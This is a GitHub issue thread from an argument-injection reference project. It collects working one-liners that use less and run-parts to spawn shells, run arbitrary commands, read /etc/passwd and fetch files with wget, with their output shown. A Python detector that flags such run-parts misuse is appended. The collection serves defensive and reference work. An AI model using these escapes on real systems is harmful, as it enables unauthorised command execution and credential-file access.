Contributing and Distinction from GTFOBins #1

Open
superswan opened this issue Apr 4, 2023 · 3 comments
Comments

@superswan

Hello, I would like to make a few contributions, but it's hard for me to determine if it truly falls under "Argument/Parameter injection". I get the concept but I'm not sure there is much distinction between this sort of thing and more general GTFOBins/LOLBin abuse. Here are some examples.

Spawning a shell with less
Here file.txt would contain the command to be run, for example "/bin/sh"

LESSOPEN="|/bin/sh %s" less file.txt

Spawning a shell with run-parts
run-parts --new-session --regex '^sh$' /bin

@MegaManSec
Member

Hey @superswan,
I am sorry for taking so long to reply, I apparently forgot to turn notifications on for this project.

I think the first case isn't really an argument injection because setting an environmental variable like that isn't an argument for the program (less) itself.

As for run-parts, it certainly qualifies. Can you give some examples of using it to execute an arbitrary command, rather than spawn a shell?

@bcoles
Contributor

bcoles commented Dec 23, 2023

> As for run-parts, it certainly qualifies. Can you give some examples of using it to execute an arbitrary command, rather than spawn a shell?

You can use STDIN.

$ echo id | run-parts --regex '^sh$' /usr/bin
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),134(sambashare)

Alternatively, executing a command depends on which shell is used. The following examples use -c to execute a command.

Execute a command with Dash (run /usr/bin/dash -c "/usr/bin/id"):

$ run-parts --new-session --regex '^dash$' /usr/bin -a "-c" -a /usr/bin/id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),134(sambashare)

Execute a command with Bash (run /usr/bin/bash -c "/usr/bin/id"):

$ run-parts --new-session --regex '^bash$' /usr/bin -a "-c" -a "/usr/bin/id"
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),134(sambashare)

Execute a sequence of commands (run /usr/bin/bash -c "echo hello > /tmp/hello ; ls -la /tmp/hello ; cat /tmp/hello"):

$ run-parts --regex '^bash$' /usr/bin -a "-c" -a "echo hello > /tmp/hello ; ls -la /tmp/hello ; cat /tmp/hello"
-rw-r--r-- 1 user user 6 Dec 23 08:57 /tmp/hello
hello

Read a file (run /usr/bin/cat /etc/passwd):

$ run-parts --regex '^cat$' /usr/bin -a "/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]

Download a file (run /usr/bin/wget https://example.com):

$ run-parts --regex '^wget$' /usr/bin -a "https://example.com"
--2023-12-23 18:16:28--  https://example.com/
Resolving example.com (example.com)... 93.184.216.34, 2606:2800:220:1:248:1893:25c8:1946
Connecting to example.com (example.com)|93.184.216.34|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1256 (1.2K) [text/html]
Saving to: ‘index.html’

index.html                                          100%[===================================================================================================================>]   1.23K  --.-KB/s    in 0s      

2023-12-23 18:16:29 (76.5 MB/s) - ‘index.html’ saved [1256/1256]
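From the defender's side, every invocation in the two posts above shares one shape: run-parts is pointed at a system bin directory, `--regex` is an anchored literal that selects a single interpreter or utility, and `-a` (or stdin) supplies that program's arguments. The script below is an added example, not code from this project or from either commenter: it parses run-parts command lines as a process-creation collector would record them, extracts the `--regex`, `-a`/`--arg` and directory operands, and flags the combinations shown in this thread while leaving ordinary cron-style usage alone. The `SAMPLE_CMDLINES` list is constructed for the demonstration, and the interpreter and utility name sets are assumptions to be tuned per environment.

```python
"""Flag run-parts invocations that use --regex/-a to drive an interpreter or
utility out of a system bin directory instead of running a hook directory.

Added example for this thread; the option names follow Debian run-parts
(--regex=RE, -a/--arg=ARGUMENT, --new-session). Name sets are assumptions.
"""
import os
import re
import shlex

# Interpreters that run-parts should never be made to select via --regex.
INTERPRETER_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "python3", "perl"}
# Utilities whose selection from a bin directory matches the examples above.
UTILITY_NAMES = {"cat", "wget", "curl", "nc"}
# Directories that hold binaries rather than run-parts hook scripts.
BIN_DIRS = {"/bin", "/usr/bin", "/sbin", "/usr/sbin", "/usr/local/bin"}

# Constructed sample command lines (as a process-creation log would record argv).
SAMPLE_CMDLINES = [
    "run-parts --report /etc/cron.daily",                      # normal cron usage
    "run-parts --regex '^[0-9]+-.*' /etc/update-motd.d",       # normal motd usage
    "run-parts --regex '^sh$' /usr/bin",                        # stdin-fed shell
    "run-parts --new-session --regex '^dash$' /usr/bin -a \"-c\" -a /usr/bin/id",
    "run-parts --regex='^cat$' --arg=/etc/passwd /usr/bin",    # long-option form
    "run-parts --regex '^wget$' /usr/bin -a https://example.com",
    "ls -la /tmp",                                              # not run-parts at all
]


def parse_run_parts(cmdline):
    """Return (regex, args, directory) for a run-parts command line, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or os.path.basename(argv[0]) != "run-parts":
        return None
    regex, args, directory = None, [], None
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--regex="):
            regex = tok[len("--regex="):]
        elif tok == "--regex" and i + 1 < len(argv):
            i += 1
            regex = argv[i]
        elif tok.startswith("--arg="):
            args.append(tok[len("--arg="):])
        elif tok in ("-a", "--arg") and i + 1 < len(argv):
            i += 1
            args.append(argv[i])          # consume the value even if it looks like an option
        elif tok == "--":                 # end of options: next token is the directory
            if i + 1 < len(argv):
                directory = argv[i + 1]
            break
        elif tok.startswith("-"):
            pass                          # other options (--new-session, --test, ...)
        else:
            directory = tok
        i += 1
    return regex, args, directory


def literal_target(regex):
    """Return the filename selected by an anchored literal regex like '^bash$'."""
    m = re.fullmatch(r"\^([A-Za-z0-9_.+-]+)\$", regex or "")
    return m.group(1) if m else None


def assess(cmdline):
    """Return a list of reasons the line is suspicious ([] if benign, None if not run-parts)."""
    parsed = parse_run_parts(cmdline)
    if parsed is None:
        return None
    regex, args, directory = parsed
    target = literal_target(regex)
    reasons = []
    if target in INTERPRETER_NAMES:
        reasons.append(f"--regex selects interpreter '{target}'")
        if not args:
            reasons.append("no -a arguments: interpreter reads its commands from stdin")
    elif target in UTILITY_NAMES:
        reasons.append(f"--regex selects utility '{target}'")
    if "-c" in args:
        reasons.append("-a passes '-c' (command string to a shell)")
    if directory and os.path.normpath(directory) in BIN_DIRS:
        reasons.append(f"directory is a system bin directory ({directory})")
    return reasons


def scan(cmdlines):
    """Run assess() over many command lines and keep only the flagged ones."""
    findings = []
    for line in cmdlines:
        reasons = assess(line)
        if reasons:
            findings.append({"cmdline": line, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f["cmdline"])
        for r in f["reasons"]:
            print("   -", r)
```

Two of the seven constructed lines (the cron and motd ones) pass untouched because their regexes are not anchored single-name literals and their directories are hook directories; the other run-parts lines are each flagged with the specific reason, which makes the rule easy to review and tune. Matching only on `--regex` plus a bin directory is deliberate: a plain `run-parts /etc/cron.hourly` is legitimate and very common, so the rule keys on the operand combination this thread documents rather than on the binary name alone.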

@MegaManSec
Member

Great, I will make an .md for it soon.
